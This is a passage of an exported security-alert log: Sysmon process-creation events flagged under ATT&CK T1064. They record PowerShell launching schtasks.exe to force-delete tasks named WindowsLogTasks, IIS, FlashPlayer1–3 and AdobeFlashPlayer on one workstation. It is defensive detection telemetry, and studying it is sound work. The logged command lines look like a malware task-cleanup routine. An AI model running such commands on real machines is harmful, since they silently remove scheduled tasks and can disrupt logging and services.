Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.352",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.866 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-001013d12b00} +ProcessId: 5624 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsLogTasks /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsLogTasks /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.869801400Z"",""eventRecordID"":""3309"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.866\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-001013d12b00}\r\nProcessId: 5624\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsLogTasks /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.866"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-001013d12b00}"",""processId"":""5624"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsLogTasks /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.289",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.810 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-0010e1ce2b00} +ProcessId: 8100 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN IIS /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN IIS /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.815838300Z"",""eventRecordID"":""3308"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.810\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-0010e1ce2b00}\r\nProcessId: 8100\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN IIS /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.810"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-0010e1ce2b00}"",""processId"":""8100"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN IIS /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.255",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.761 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-0010f8cc2b00} +ProcessId: 4312 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN FlashPlayer3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.775117500Z"",""eventRecordID"":""3307"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.761\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-0010f8cc2b00}\r\nProcessId: 4312\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.761"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-0010f8cc2b00}"",""processId"":""4312"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN FlashPlayer3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.171",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.704 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-001007ca2b00} +ProcessId: 5196 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN FlashPlayer2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.706878800Z"",""eventRecordID"":""3306"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.704\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-001007ca2b00}\r\nProcessId: 5196\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.704"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-001007ca2b00}"",""processId"":""5196"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN FlashPlayer2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.164",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.646 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-0010a9c72b00} +ProcessId: 3668 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN FlashPlayer1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.654588600Z"",""eventRecordID"":""3305"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.646\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-0010a9c72b00}\r\nProcessId: 3668\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.646"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-0010a9c72b00}"",""processId"":""3668"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN FlashPlayer1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.076",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.608 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-0010a7c52b00} +ProcessId: 5616 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN AdobeFlashPlayer /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN AdobeFlashPlayer /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.612169900Z"",""eventRecordID"":""3304"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.608\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-0010a7c52b00}\r\nProcessId: 5616\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN AdobeFlashPlayer /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.608"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-0010a7c52b00}"",""processId"":""5616"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN AdobeFlashPlayer /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 